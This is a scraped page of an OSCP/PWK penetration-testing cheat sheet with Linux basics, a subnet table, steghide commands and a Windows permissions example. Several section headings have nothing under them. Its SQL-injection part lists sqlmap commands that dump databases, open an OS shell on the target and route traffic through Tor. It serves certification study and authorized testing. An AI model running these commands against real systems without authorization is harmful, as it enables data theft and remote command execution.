Home

Awesome

PWK-CheatSheet

<pre> ██▓███ █ ███ ▄█▀ ▄████▄ ██░ ██▓█████▄▄▄ ▄▄▄█████▓ ██████ ██░ ██▓█████▓████▄▄▄█████▓ ▓██░ ██▓█░ █ ░███▄█▒ ▒██▀ ▀█ ▓██░ ██▓█ ▒████▄ ▓ ██▒ ▓▒ ▒██ ▒▓██░ ██▓█ ▀▓█ ▓ ██▒ ▓▒ ▓██░ ██▓▒█░ █ ░▓███▄░ ▒▓█ ▄▒██▀▀██▒███ ▒██ ▀█▄▒ ▓██░ ▒░ ░ ▓██▄ ▒██▀▀██▒███ ▒███ ▒ ▓██░ ▒░ ▒██▄█▓▒ ░█░ █ ░▓██ █▄ ▒▓▓▄ ▄██░▓█ ░██▒▓█ ░██▄▄▄▄█░ ▓██▓ ░ ▒ ██░▓█ ░██▒▓█ ▄▒▓█ ░ ▓██▓ ░ ▒██▒ ░ ░░██▒██▒██▒ █▄ ▒ ▓███▀ ░▓█▒░██░▒████▓█ ▓██▒▒██▒ ░ ▒██████▒░▓█▒░██░▒████░▒████▒▒██▒ ░ ▒▓▒░ ░ ░ ▓░▒ ▒▒ ▒▒ ▓▒ ░ ░▒ ▒ ░▒ ░░▒░░░ ▒░ ▒▒ ▓▒█░▒ ░░ ▒ ▒▓▒ ▒ ░▒ ░░▒░░░ ▒░ ░░ ▒░ ░▒ ░░ ░▒ ░ ▒ ░ ░░ ░▒ ▒░ ░ ▒ ▒ ░▒░ ░░ ░ ░▒ ▒▒ ░ ░ ░ ░▒ ░ ░▒ ░▒░ ░░ ░ ░░ ░ ░ ░ ░░ ░ ░░ ░░ ░ ░ ░ ░░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ </pre>

Penetration Testing with Kali Linux (PWK) course and Offensive Security Certified Professional (OSCP) Cheat Sheet

Table of Contents

Linux 101

Set the Target IP Address to the $ip system variable

$ export ip=192.168.1.100

Find the location of a file

$ locate sbd.exe

Search through directories in the $PATH environment variable

$ which sbd

Find a search for a file that contains a specific string in it’s name

$ find / -name sbd\*

Show active internet connections

$ netstat -lntp

Change Password

$ passwd

Verify a service is running and listening

$ netstat -antp |grep apache

Start a service

$ systemctl start ssh
$ systemctl start apache2

Unzip a gz file

$ gunzip access.log.gz

Unzip a tar.gz file

$ tar -xzvf file.tar.gz

Information Gathering & Vulnerability Scanning

<!-- -->

Subnet Reference Table

/AddressesHostsNetmaskAmount of a Class C
/3042255.255.255.2521/64
/2986255.255.255.2481/32
/281614255.255.255.2401/16
/273230255.255.255.2241/8
/266462255.255.255.1921/4
/25128126255.255.255.1281/2
/24256254255.255.255.01
/23512510255.255.254.02
/2210241022255.255.252.04
/2120482046255.255.248.08
/2040964094255.255.240.016
/1981928190255.255.224.032
/181638416382255.255.192.064
/173276832766255.255.128.0128
/166553665534255.255.0.0256
<!-- -->

apt-get install steghide

steghide extract -sf picture.jpg

steghide info picture.jpg

apt-get install stegosuite

Buffer Overflows and Exploits

Shells

File Transfers

Privilege Escalation

scsiaccess.exe
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
Everyone:(I)(F)

Client, Web and Password Attacks

Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs
Enumerate tables from a specific database
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables
Dump table data from a specific database and table
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
Specify parameter to exploit
sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2
Specify parameter to exploit in 'nice' URIs
sqlmap --dbms=mysql -u "http://www.example.com/param1/value1\*/param2/value2" --dbs # exploits param1
Get OS shell
sqlmap --dbms=mysql -u "$URL" --os-shell
Get SQL shell
sqlmap --dbms=mysql -u "$URL" --sql-shell
SQL query
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"
Use Tor Socks5 proxy
sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs

<span id="_6nmbgmpltwon" class="anchor"><span id="_Toc480741823" class="anchor"></span></span>Networking, Pivoting and Tunneling

<span id="_ujpvtdpc9i67" class="anchor"><span id="_Toc480741824" class="anchor"></span></span>The Metasploit Framework

<span id="_51btodqc88s2" class="anchor"><span id="_Toc480741825" class="anchor"></span></span>Bypassing Antivirus Software